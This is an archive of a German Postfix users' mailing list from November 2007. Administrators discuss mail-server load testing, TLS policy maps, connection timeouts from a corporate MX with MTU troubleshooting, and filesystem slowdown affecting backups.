Vivo Foto Torpedo

From usenet at deiszner.de Thu Nov 1 01:20:09 2007 From: usenet at deiszner.de (Sebastian Deiszner) Date: Thu, 01 Nov 2007 01:20:09 +0100 Subject: [Postfixbuch-users] Lastsimulation Message-ID: <47291BB9.4070605@deiszner.de> Hallo, ich suche ein Programm, mit welchem ich Last auf einem Mailserver simulieren kann von innen uns aussen - z.b. 100 Verbindungsversuche pro Minute oder 100 Mails á 500 Kb oder..... Vorteilhaft wäre auch, wenn das Programm (das von innen) mitbekommt, wenn der Server kurz vor dem krepieren steht und dann aufhört. gruß Sebastian ____________________________________________________________ Corps, Burschenschaft, Sängerschaft - das ist doch alles die selbe braune Sauce. Wir sitzen da in unseren Erdhöhlen, schwenken Hakenkreuzfahnen und gröhlen laut das Deutschlandlied - alle 97 Strophen gleichzeitig. Allerdings nur, wenn wir nicht gerade kleine Kinder fressen. (ARD-Tatort 28.10.2007) Gruß Sebastian Deiszner :-) http://www.deiszner.de From postfix at jpkessler.info Thu Nov 1 08:07:24 2007 From: postfix at jpkessler.info (Jan P. Kessler) Date: Thu, 01 Nov 2007 08:07:24 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?TLS_f=FCr_localhost_Verbindun?= =?iso-8859-15?q?gen_unterbinden?= Message-ID: <47297B2C.5070902@jpkessler.info> Moin, bei einem Kunden setzen wir postfix und eine etwas ältere Version der Trendmicro Viruswall for UNIX im üblichen Sandwich-Verfahren ein. Letztere mag allerdings kein STARTTLS (lost connection to 127.0.0.1 after STARTTLS, heul). Da wir TLS optional jedem anbieten, hatte ich unter postfix 2.2 daher eine tls_per_site Map eingesetzt, die folgendes enthielt: # TLS für localhost unterbinden 127.0.0.1 none localhost none # Rest MUST_NOPEERMATCH ... was auch blendend funktionierte. Nun wollte ich das ganze kürzlich auf pf >= 2.3 kompatible Syntax umstellen und habe die Map daher in Richtung smtp_tls_policy_maps umgestellt. Doch egal, wie ich es eintrage, für die Verbindung zur Trend wird weiterhin TLS versucht, was natürlich scheitert. Ich habe folgende Kombinationen ausprobiert: 127.0.0.1 none [127.0.0.1]:10025 none [127.0.0.1]:virusscan none Half nix - es wurde immer wieder TLS versucht. Letztendlich habe ich mir nun via master.cf beholfen: # Eingang, tcp 25 smtp inet n - y - - smtpd -o smtp_use_tls=no -o smtpd_use_tls=yes # reinjection, tcp 10026 smtp-out inet n - y - - smtpd -o smtp_use_tls=yes -o smtpd_use_tls=no was auch klappt. Dennoch frage ich mich, ob ich das ganze nicht via Map steuern könnte. Was übersehe ich hier nur? Gruesse, Jan From p at state-of-mind.de Thu Nov 1 09:03:50 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Thu, 1 Nov 2007 09:03:50 +0100 Subject: [Postfixbuch-users] Lastsimulation In-Reply-To: <47291BB9.4070605@deiszner.de> References: <47291BB9.4070605@deiszner.de> Message-ID: <20071101080350.GA26440@state-of-mind.de> * Sebastian Deiszner : > ich suche ein Programm, mit welchem ich Last auf einem Mailserver > simulieren kann von innen uns aussen - z.b. 100 Verbindungsversuche pro > Minute oder 100 Mails á 500 Kb oder..... smtp-sink und smtp-source aus den Postfix Sourcen oder ggf. über deinen Paket-Manager. Zum Messen ist auch mstone gut, wenn auch nicht immer plug & play. > Vorteilhaft wäre auch, wenn das Programm (das von innen) mitbekommt, > wenn der Server kurz vor dem krepieren steht und dann aufhört. Tun alle genannten nicht. p at rick -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From cite at incertum.net Thu Nov 1 09:42:26 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Thu, 1 Nov 2007 09:42:26 +0100 Subject: [Postfixbuch-users] Lastsimulation In-Reply-To: <47291BB9.4070605@deiszner.de> References: <47291BB9.4070605@deiszner.de> Message-ID: <20071101084226.GJ7082@mail.incertum.net> * Sebastian Deiszner wrote: > ich suche ein Programm, mit welchem ich Last auf einem Mailserver > simulieren kann von innen uns aussen - z.b. 100 Verbindungsversuche pro > Minute oder 100 Mails á 500 Kb oder..... smtp-source(1) kann soweit ich das sehe, alles, was Du brauchst. > Vorteilhaft wäre auch, wenn das Programm (das von innen) mitbekommt, > wenn der Server kurz vor dem krepieren steht und dann aufhört. Ok, ich habe mich geirrt - das kann es natürlich nicht ;) Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 25 Zeichen, daß Du erwachsen bist, Nummer 22: "Ich kann nicht mehr soviel trinken wie damals" ersetzt "Ich trinke nie wieder so viel". From p.heinlein at heinlein-support.de Thu Nov 1 11:01:31 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 1 Nov 2007 11:01:31 +0100 Subject: [Postfixbuch-users] Lastsimulation In-Reply-To: <47291BB9.4070605@deiszner.de> References: <47291BB9.4070605@deiszner.de> Message-ID: <200711011101.32094.p.heinlein@heinlein-support.de> Am Donnerstag, 1. November 2007 schrieb Sebastian Deiszner: > ich suche ein Programm, mit welchem ich Last auf einem Mailserver > simulieren kann von innen uns aussen - z.b. 100 Verbindungsversuche pro > Minute oder 100 Mails á 500 Kb oder..... smtp-source? > Vorteilhaft wäre auch, wenn das Programm (das von innen) mitbekommt, > wenn der Server kurz vor dem krepieren steht und dann aufhört. Admin + top Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From ram at i-tux.de Thu Nov 1 14:59:57 2007 From: ram at i-tux.de (ram at i-tux.de) Date: Thu, 1 Nov 2007 14:59:57 +0100 (CET) Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" Message-ID: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> Hallo Liste, ich habe gestern von der kleinen Firma, bei der ich beschäftigt bin, den MX-Record von unserem Provider weg auf einen selbst administrierten Server legen lassen. Grösserer Katastrophen sind zum Glück bis jetzt entweder noch nicht aufgetaucht oder unentdeckt geblieben. Aber ich habe Probleme mit dem gegnerischen SMTPd, der uns 99% der eMails einliefert. Dieser (mxout2.volkswagen.de) baut seine Verbindungen auf, liefert erfolgreich seine eMails ab, aber schliesst nie die Connections. Das führt soweit, dass er innerhalb von ein paar Minuten zu viele Connections auf hat. Im mail.log bildet sich das wie folgend ab: ____________________ Nov 1 14:17:51 mx01 postfix/smtpd[...]: connect from mxout2.volkswagen.de[194.114.62.48] Nov 1 14:17:51 mx01 postfix/qmgr[...]: 1D24FD4835C: from=, size=5691, nrcpt=1 (queue active) Nov 1 14:17:51 mx01 postfix/smtp[...]: 1D24FD4835C: to=, relay=relay.meine.domain[xx.xx.xx.xx]:25, delay=0.18, delays=0.09/0/0.04/0.05, dsn=2.0.0, status=sent (250 2.0.0 lA1DHp4U001712 Message accepted for delivery) ... aber viel häufiger kommt es zu folgendem: Nov 1 13:56:14 mx01 postfix/smtpd[14228]: timeout after END-OF-MESSAGE from mxout2.volkswagen.de[194.114.62.48] Nov 1 13:56:14 mx01 postfix/smtpd[14228]: disconnect from mxout2.volkswagen.de[194.114.62.48] [...] ca. 5 mal hintereinander die gleichen 2 obrigen Zeilen, nur andere PIDs jeweils Nov 1 13:56:51 mx01 postfix/smtpd[14257]: connect from mxout2.volkswagen.de[194.114.62.48] Nov 1 13:56:51 mx01 postfix/smtpd[14257]: warning: Connection concurrency limit exceeded: 21 from mxout2.volkswagen.de[194.114.62.48] for service smtp Nov 1 13:56:51 mx01 postfix/smtpd[14257]: disconnect from mxout2.volkswagen.de[194.114.62.48] [... Bildschirmseiten füllend nur noch diese Meldungen mit wechselnden PIDs] Nov 1 13:56:51 mx01 postfix/smtpd[14248]: connect from mxout2.volkswagen.de[194.114.62.48] Nov 1 13:56:51 mx01 postfix/smtpd[14248]: warning: Connection concurrency limit exceeded: 21 from mxout2.volkswagen.de[194.114.62.48] for service smtp Nov 1 13:56:51 mx01 postfix/smtpd[14248]: disconnect from mxout2.volkswagen.de[194.114.62.48] (Ich habe `smtpd_client_connection_count_limit = 20' gesetzt in main.cf, sodass nicht "erst" die 51. Verbindung abgelehnt wird) ____________________ Um den `timeout after END-OF-MESSAGE' zu begegnen, habe ich `smtp_pix_workaround_maps = hash:/etc/postfix/smtp_pix_workaround' der main.cf hinzugefügt. mx01:/etc/postfix# cat smtp_pix_workaround 194.114.62.48 delay_dotcrlf,disable_esmtp mx01:/etc/postfix# postmap smtp_pix_workaround mx01:/etc/postfix# /etc/init.d/postfix restart Leider hat dies nichts Mergliches geändert. :-( Daher frage ich mich: - "leidet" mxout2.volkswagen.de[194.114.62.48] an dem PIX-Bug? - ist dann der Inhalt der `smtp_pix_workaround' richtig? - Kann ich irgenwie erkennen, ob für Connection von mxout2 die PIX-Bug-Work-a-rounds angewandt werden? - gibt etwas entsprechend wie "smtpd_after_end_of_message_timeout"? - Bin ich komplett auf dem falschem Dampfer??? und was dann? Gruss und besten Dank! Reza P.S.: Wenn Volkswagen nicht Kunde von uns wäre, würde 94.114.62.48 ein Eintrag im IP Packetflter erhalten und das Problem wäre gelöst ;-) für die, die es genau wissen wollen, um zu helfen: -------------------------------------------------- mx01:/etc/postfix# cat /proc/version Linux version 2.6.18-4-686-bigmem (Debian 2.6.18.dfsg.1-12etch2) (dannf at debian.org) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Thu May 10 00:23:00 UTC 2007 mx01:/etc/postfix# dpkg -l postfix [...] ||/ Name Version Description ii postfix 2.3.8-2+b1 A high-performance mail transport agent ...ganze System ist ein Debian up2date 'stable'-etch mx01:/etc/postfix# netstat -tunpa | grep 194.114.62.48 | wc -l 20 typisches ATOP: PRC | sys 0.02s | user 0.02s | #thr 115 | #zombie 0 | #exit 0 | CPU | sys 0% | user 0% | irq 0% | idle 100% | wait 0% | MEM | tot 1.0G | free 422.7M | cache 230.3M | buff 55.2M | slab 48.0M | SWP | tot 2.0G | free 2.0G | | vmcom 1.1G | vmlim 2.5G | DSK | sda | busy 0% | read 0 | write 64 | avio 0 ms | NET | transport | tcpi 131 | tcpo 137 | udpi 23 | udpo 23 | NET | network | ipi 154 | ipo 160 | ipfrw 0 | deliv 154 | NET | dev eth0 | pcki 138 | pcko 139 | in 14 Kbps | out 15 Kbps | NET | dev lo | pcki 21 | pcko 21 | in 1 Kbps | out 1 Kbps | From conny.klemm at gmail.com Thu Nov 1 15:26:58 2007 From: conny.klemm at gmail.com (Conny Klemm) Date: Thu, 1 Nov 2007 15:26:58 +0100 Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> Message-ID: <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> > ... aber viel häufiger kommt es zu folgendem: > Nov 1 13:56:14 mx01 postfix/smtpd[14228]: timeout after END-OF-MESSAGE > from mxout2.volkswagen.de[194.114.62.48] > Nov 1 13:56:14 mx01 postfix/smtpd[14228]: disconnect from > mxout2.volkswagen.de[194.114.62.48] > [...] ca. 5 mal hintereinander die gleichen 2 obrigen Zeilen, nur andere > PIDs jeweils > Versuche doch mal, deine MTU runter zu drehen. z.B. ifconfig eth0 1456 Gruß Conny From ram at i-tux.de Thu Nov 1 15:56:38 2007 From: ram at i-tux.de (ram at i-tux.de) Date: Thu, 1 Nov 2007 15:56:38 +0100 (CET) Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> Message-ID: <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> >> ... aber viel häufiger kommt es zu folgendem: >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: timeout after END-OF-MESSAGE >> from mxout2.volkswagen.de[194.114.62.48] >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: disconnect from >> mxout2.volkswagen.de[194.114.62.48] >> [...] ca. 5 mal hintereinander die gleichen 2 obrigen Zeilen, nur andere >> PIDs jeweils >> > > Versuche doch mal, deine MTU runter zu drehen. z.B. ifconfig eth0 1456 > > Gruß > Conny > -- hmm, mir ist hinreichend einleuchtend, wie das den PIX-Bug umgehen könnte - zur Zeit sieht es aber noch nicht aus, als wenn es hilft. Disconnects vom mxout02 sehe ich nur, wenn entweder das timeout eintritt oder der Aufbau von weiteren neuen Connections abgelehnt wird. Aber ich lasse die MTU erstmal auf 1456 und beobachte :-) [...] bringt leider nichts: Nov 1 15:55:29 mx01 postfix/smtpd[2803]: warning: Connection concurrency limit exceeded: 21 from mxout2.volkswagen.de[194.114.62.48] for service smtp Gruss Reza P.S.: `ifconfig eth0 1456' führt dazu, dass _alle_ TCP/IP-Verbindungen abbrechen :-) Ich Hornochse hab's ausprobiert. Wer es gefahrloser ausprobieren möchte, sollte `ifconfig eth0 mtu 1456' nehmen.... From ml at awinkelmann.de Thu Nov 1 20:05:45 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 1 Nov 2007 20:05:45 +0100 Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> Message-ID: <200711012005.45720.ml@awinkelmann.de> On Donnerstag, 1. November 2007, ram at i-tux.de wrote: > >> ... aber viel häufiger kommt es zu folgendem: > >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: timeout after END-OF-MESSAGE > >> from mxout2.volkswagen.de[194.114.62.48] > >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: disconnect from > >> mxout2.volkswagen.de[194.114.62.48] > >> [...] ca. 5 mal hintereinander die gleichen 2 obrigen Zeilen, nur andere > >> PIDs jeweils > > > > Versuche doch mal, deine MTU runter zu drehen. z.B. ifconfig eth0 +: mtu> 1456 > bringt leider nichts: Ja, weil smtpd != smtp ist. Du bist der Empfänger. Bei SMTP schickt der Sender die grossen Pakete, der Empfänger gibt nur kurze Quittungen zurück. Daher ist es relativ unsinnig die MTU-Grösse beim Empfänger herunterzudrehen. MTU-Probleme gibt es, wenn eine Station auf dem Weg zwischen Sender und Empfänger mit der Paketgrösse nicht zurecht kommt und sie entweder verschluckt oder eine Meldung zurück schickt, die aber aufgrund einer vermurksten Firewallkonfiguration verschütt geht oder sonst wie verloren geht. Was steht denn zwischen dem Client und dem Internet? Ist da noch ein Router im Spiel? Kann vielleicht einfach nur der Sender ein Problem haben? Am eindeutigsten bekommst Du den schuldigen heraus indem Du die Pakete mitschneidest (z.B. tcpdump). Am besten sogar möglichst nah am Internet. > Nov 1 15:55:29 mx01 postfix/smtpd[2803]: warning: Connection concurrency > limit exceeded: 21 from mxout2.volkswagen.de[194.114.62.48] for service > smtp > P.S.: `ifconfig eth0 1456' führt dazu, dass _alle_ TCP/IP-Verbindungen > abbrechen :-) Ich Hornochse hab's ausprobiert. > Wer es gefahrloser ausprobieren möchte, sollte `ifconfig eth0 mtu 1456' > nehmen.... Ja klar, man-Pages lesen eh nur Loser. -- Andreas From conny.klemm at gmail.com Thu Nov 1 20:22:18 2007 From: conny.klemm at gmail.com (Conny Klemm) Date: Thu, 1 Nov 2007 20:22:18 +0100 Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <200711012005.45720.ml@awinkelmann.de> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> <200711012005.45720.ml@awinkelmann.de> Message-ID: <23ea17940711011222p2cd88658j78b0fdfeabf2c65@mail.gmail.com> > MTU-Probleme gibt es, wenn eine Station auf dem Weg zwischen Sender und > Empfänger mit der Paketgrösse nicht zurecht kommt und sie entweder > verschluckt oder eine Meldung zurück schickt, die aber aufgrund einer > vermurksten Firewallkonfiguration verschütt geht oder sonst wie verloren > geht. Ja, sag ich doch. Ich hatte das selbe Problem mit der LVM und Volkswagen. Ich habe ne feste IP von T-Com mit einer MTU von 1456 am Router . Sobald ich genau die selbe am Server oder auch tiefer eingestellt hatte flutschte alles durch. Gruß Conny From ram at i-tux.de Thu Nov 1 20:44:49 2007 From: ram at i-tux.de (ram at i-tux.de) Date: Thu, 1 Nov 2007 20:44:49 +0100 (CET) Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <200711012005.45720.ml@awinkelmann.de> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> <200711012005.45720.ml@awinkelmann.de> Message-ID: <1821.87.79.46.49.1193946289.squirrel@www.webpeer.de> > On Donnerstag, 1. November 2007, ram at i-tux.de wrote: > >> >> ... aber viel häufiger kommt es zu folgendem: >> >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: timeout after >> END-OF-MESSAGE >> >> from mxout2.volkswagen.de[194.114.62.48] >> >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: disconnect from >> >> mxout2.volkswagen.de[194.114.62.48] >> >> [...] ca. 5 mal hintereinander die gleichen 2 obrigen Zeilen, nur >> andere >> >> PIDs jeweils >> > >> > Versuche doch mal, deine MTU runter zu drehen. z.B. ifconfig eth0 >> > +: mtu> 1456 > >> bringt leider nichts: > > Ja, weil smtpd != smtp ist. Du bist der Empfänger. > > Bei SMTP schickt der Sender die grossen Pakete, der Empfänger gibt nur > kurze Quittungen zurück. Daher ist es relativ unsinnig die MTU-Grösse beim > Empfänger herunterzudrehen. Sehe ich ein. > MTU-Probleme gibt es, wenn eine Station auf dem Weg zwischen Sender und > Was steht denn zwischen dem Client und dem Internet? Ist da noch ein > Router im Spiel? sagtest nicht gerade ich sei Empfänger? ;) Ich habe ehrlich keine Ahnung, was die VW AG Wolfsburg da alles zwischen seinen MXern und dem Internet haben könnte. Aber es wird nicht nur ein D-Link Router sein... Zwischen Client und Server stehen zumindest sichtbar 10 weitere Hops, ganz normales Routing im Inet halt. > Kann vielleicht einfach nur der Sender ein Problem haben? Aus meiner Sicht ist es so. Nur bringt mir dieses Wissen nichts ohne Lösung. Wir sind als Dienstleister für VW tätig und müssen/sollten sogar etwaige Schwächen unseres Auftragsgebers meistern können. Und der Sender ist der Prio 10 MX eines DAX-Konzerns. Ist für mich immer sehr riskant da jemand ans Bein zu pinckeln ohne wirklich zu wissen, was los ist ;) > Am eindeutigsten bekommst Du den schuldigen heraus indem Du die Pakete > mitschneidest (z.B. tcpdump). Am besten sogar möglichst nah am Internet. Was würde mir der Dump verraten? Das der Client die Connection nicht abbaut? Hättest den Tip, auf was ich achten könnte? Mein smtpd hat eine öffentliche IP an eth0 (keine DMZ etc) - steht bei Hetzner. > Ja klar, man-Pages lesen eh nur Loser. unnötig - der Spruch, nicht die man-pages. > Andreas besten Dank Andreas,.... weiter bin ich aber auch noch nicht :-( Gruss Reza From ram at i-tux.de Thu Nov 1 20:48:28 2007 From: ram at i-tux.de (ram at i-tux.de) Date: Thu, 1 Nov 2007 20:48:28 +0100 (CET) Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <23ea17940711011222p2cd88658j78b0fdfeabf2c65@mail.gmail.com> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> <200711012005.45720.ml@awinkelmann.de> <23ea17940711011222p2cd88658j78b0fdfeabf2c65@mail.gmail.com> Message-ID: <6628.87.79.46.49.1193946508.squirrel@www.webpeer.de> >> MTU-Probleme gibt es, wenn eine Station auf dem Weg zwischen Sender und [...] >> vermurksten Firewallkonfiguration verschütt geht oder sonst wie verloren >> geht. > > Ja, sag ich doch. > Ich hatte das selbe Problem mit der LVM und Volkswagen. > Ich habe ne feste IP von T-Com mit einer MTU von 1456 am Router . DSL? > Gruß Gruss Reza From conny.klemm at gmail.com Thu Nov 1 20:53:17 2007 From: conny.klemm at gmail.com (Conny Klemm) Date: Thu, 1 Nov 2007 20:53:17 +0100 Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <6628.87.79.46.49.1193946508.squirrel@www.webpeer.de> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <23ea17940711010726lb81165fqdd311d3188dd4ef3@mail.gmail.com> <1703.87.79.44.70.1193928998.squirrel@www.webpeer.de> <200711012005.45720.ml@awinkelmann.de> <23ea17940711011222p2cd88658j78b0fdfeabf2c65@mail.gmail.com> <6628.87.79.46.49.1193946508.squirrel@www.webpeer.de> Message-ID: <23ea17940711011253i7a054fdar4aa884c168d7016@mail.gmail.com> Am 01.11.07 schrieb ram at i-tux.de : > >> MTU-Probleme gibt es, wenn eine Station auf dem Weg zwischen Sender und > [...] > >> vermurksten Firewallkonfiguration verschütt geht oder sonst wie verloren > >> geht. > > > > Ja, sag ich doch. > > Ich hatte das selbe Problem mit der LVM und Volkswagen. > > Ich habe ne feste IP von T-Com mit einer MTU von 1456 am Router . > DSL? Ja, Bei mir sind die mit einer höheren MTU rein gekommen. T-COM will aber halt 1456 haben. Mein ELSA-Lancom hatte dann alles nicht richtig umgesetzt und siehe da. ... Gruß Conny From cscholz at 2nibbles4u.de Fri Nov 2 03:15:54 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Fri, 2 Nov 2007 03:15:54 +0100 Subject: [Postfixbuch-users] Lastsimulation In-Reply-To: <200711011101.32094.p.heinlein@heinlein-support.de> References: <47291BB9.4070605@deiszner.de> <200711011101.32094.p.heinlein@heinlein-support.de> Message-ID: <63908DA348933441A6FB2AB998ED894F0196BD@dcex01.2nibbles4u.local> Wie könnte man denn jetzt ein eMail Server testen? Einfach nur 1000 eMails abfeuern macht doch wenig Sinn, oder? So könnte ich doch nur testen wie viele eMails über die Leitung passen. Das System dürfte sich doch aber auch nicht zu Boden drücken lassen wenn ein connection- und Prozess-Limit eingerichtet ist. Ein Test ohne die Limits würde aber kein verwertbares Ergebnis liefern. Mir fehlt gerade einfach die Erleuchtung für den Test... Gruß Christian Scholz > > Vorteilhaft wäre auch, wenn das Programm (das von innen) mitbekommt, > > wenn der Server kurz vor dem krepieren steht und dann aufhört. > > Admin + top > > Peer From p.heinlein at heinlein-support.de Fri Nov 2 08:30:10 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Fri, 2 Nov 2007 08:30:10 +0100 Subject: [Postfixbuch-users] Lastsimulation In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196BD@dcex01.2nibbles4u.local> References: <47291BB9.4070605@deiszner.de> <200711011101.32094.p.heinlein@heinlein-support.de> <63908DA348933441A6FB2AB998ED894F0196BD@dcex01.2nibbles4u.local> Message-ID: <200711020830.11004.p.heinlein@heinlein-support.de> Am Freitag, 2. November 2007 schrieb Christian Scholz: > Wie könnte man denn jetzt ein eMail Server testen? Einfach nur 1000 > eMails abfeuern macht doch wenig Sinn, oder? So könnte ich doch nur > testen wie viele eMails über die Leitung passen. Postfixbuch, Kapitel 11.4, Seite 258: Natürlich bringt es nur was, wenn Du an die Limits gehst. Das ist ja auch nicht weiter schwierig, also beispielsweise 120 Verbindungen simultan. Du mußt dann eben sehen, ob Dein System dann noch stabil ist, vor allem nicht swappt, sich anschließend wieder beruhigt. Du mußt halt testen: Was passiert, wenn mich jemand mit Verbindungen > Limit bombardiert. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From pkoch at bgc-jena.mpg.de Fri Nov 2 09:18:32 2007 From: pkoch at bgc-jena.mpg.de (Dr.Peer-Joachim Koch) Date: Fri, 02 Nov 2007 09:18:32 +0100 Subject: [Postfixbuch-users] Filesystem Performance Message-ID: <472ADD58.7070009@bgc-jena.mpg.de> Hallo, da ich annehme das hier vielleicht einige das gleiche Problem haben, könnte es sein, das es auch schon ein Lösung gibt ... Also unser Backup auf dem Mailserver ist A**-lahm. Nachdem ich verschiedene Teile überprüft habe, musste ich feststellen, dass das Filesystem quasi gealtert ist. (s. JFS Mailing Liste "jfs 'tunning' ") Als Kurzzusammenfassung: ein einfaches "find . -type f -exec cat {} > /dev/null \; " dauert auf dem Mailserver ~110 sek. Auf einem neu angelegten Dateisystem für die doppelte Anzahl 23sek. (auf einem langsameren Raid !). Gut, der Mailserver läuft jetzt 4 Jahre und kein Filesystem wird "schneller" im laufe der Zeit. Es ist sicherlich auch ein Problem des cyrus (jede Mail == eine Datei). Trotzdem würde mich interessieren, ob jemand einen Weg gefunden hat im laufenden Betrieb dieses Problem anzugehen. -- Tschau, Peer p.s. Bitte keine Diskussion mit XX oder YY als Filesystem ist alles viel besser. Erstens hilft es nicht, zweitens habe ich diesen Effekt für die meisten gängigen FS schon feststellen dürfen. Es ist nur eine Frage der Zeit ... _________________________________________________________ Max-Planck-Institut fuer Biogeochemie Dr. Peer-Joachim Koch Hans-Knöll Str.10 Telefon: ++49 3641 57-6705 D-07745 Jena Telefax: ++49 3641 57-7705 -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 7212 bytes Beschreibung: S/MIME Cryptographic Signature URL : From mhaegele at linuxrocks.dyndns.org Fri Nov 2 09:27:14 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 02 Nov 2007 09:27:14 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472ADD58.7070009@bgc-jena.mpg.de> References: <472ADD58.7070009@bgc-jena.mpg.de> Message-ID: <472ADF62.6030705@linuxrocks.dyndns.org> Dr.Peer-Joachim Koch schrieb: > Hallo, > > da ich annehme das hier vielleicht einige das gleiche Problem > haben, könnte es sein, das es auch schon ein Lösung gibt ... > > Also unser Backup auf dem Mailserver ist A**-lahm. Nachdem ich > verschiedene Teile überprüft habe, musste ich feststellen, dass das > Filesystem quasi gealtert ist. (s. JFS Mailing Liste "jfs 'tunning' ") Wohin geht das Backup? > Als Kurzzusammenfassung: ein einfaches > "find . -type f -exec cat {} > /dev/null \; " > dauert auf dem Mailserver ~110 sek. > Auf einem neu angelegten Dateisystem für die doppelte Anzahl > 23sek. (auf einem langsameren Raid !). Rein interessehalber: Darf man Fragen welche Tests mit welchem Ergebnis durchgeführt wurden? Welche Hardware ist das? "Hardware-Raid" oder Software-Raid?. > Gut, der Mailserver läuft jetzt 4 Jahre und kein Filesystem wird > "schneller" im laufe der Zeit. > Es ist sicherlich auch ein Problem des cyrus (jede Mail == eine Datei). > > Trotzdem würde mich interessieren, ob jemand einen Weg gefunden hat > im laufenden Betrieb dieses Problem anzugehen. Nur so zur Sicherheit: Das Filesystem ist nicht über 90% "voll"? -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From crandler at crandland.de Fri Nov 2 10:01:33 2007 From: crandler at crandland.de (crandler) Date: Fri, 2 Nov 2007 10:01:33 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472ADD58.7070009@bgc-jena.mpg.de> Message-ID: <006801c81d2e$f791fca0$2200a8c0@netclusive.local> > Hallo, > > da ich annehme das hier vielleicht einige das gleiche Problem > haben, könnte es sein, das es auch schon ein Lösung gibt ... Mir ist dieses Problem nicht bekannt. > Also unser Backup auf dem Mailserver ist A**-lahm. Nachdem ich > verschiedene Teile überprüft habe, musste ich feststellen, dass das > Filesystem quasi gealtert ist. (s. JFS Mailing Liste "jfs 'tunning' ") Was genau macht das Backup und wohin werden die Dateien gesichert? Liefert hdparm "normale" Werte? Sind die Platten in Ordnung? > Als Kurzzusammenfassung: ein einfaches > "find . -type f -exec cat {} > /dev/null \; " > dauert auf dem Mailserver ~110 sek. > Auf einem neu angelegten Dateisystem für die doppelte Anzahl > 23sek. (auf einem langsameren Raid !). Das neu angelegte Dateisystem beherbergt identische Daten? Wurden die Tests bei beiden Systemen unter identischen (Last-)Bedingungen durchgeführt? Nicht, dass ein System im IDLE läuft. Klar, dass die Ergebnisse dann verfälscht sind. > Gut, der Mailserver läuft jetzt 4 Jahre und kein Filesystem wird > "schneller" im laufe der Zeit. Das ist kein wirklicher Grund für ein langsames Dateisystem. ;) > Es ist sicherlich auch ein Problem des cyrus (jede Mail == eine Datei). Das ist höchsten ein Grund dafür, dass das find/backup/... länger dauert, denn je mehr Dateien, desto länger das find/backup/... ;) Sollte aber klar sein. > Trotzdem würde mich interessieren, ob jemand einen Weg gefunden hat > im laufenden Betrieb dieses Problem anzugehen. Ich würde als Schritt 1 sicherstellen, dass die Hardware zu 100 % in Ordnung ist. Ggfs. Partity vom RAID neugenerieren, sofern vorhanden und möglich. > p.s. Bitte keine Diskussion mit XX oder YY als Filesystem ist > alles viel besser. Erstens hilft es nicht, zweitens habe ich > diesen Effekt für die meisten gängigen FS schon feststellen > dürfen. Es ist nur eine Frage der Zeit ... Wäre es denn grundsätzlich möglich? :) Gruß Sven From pkoch at 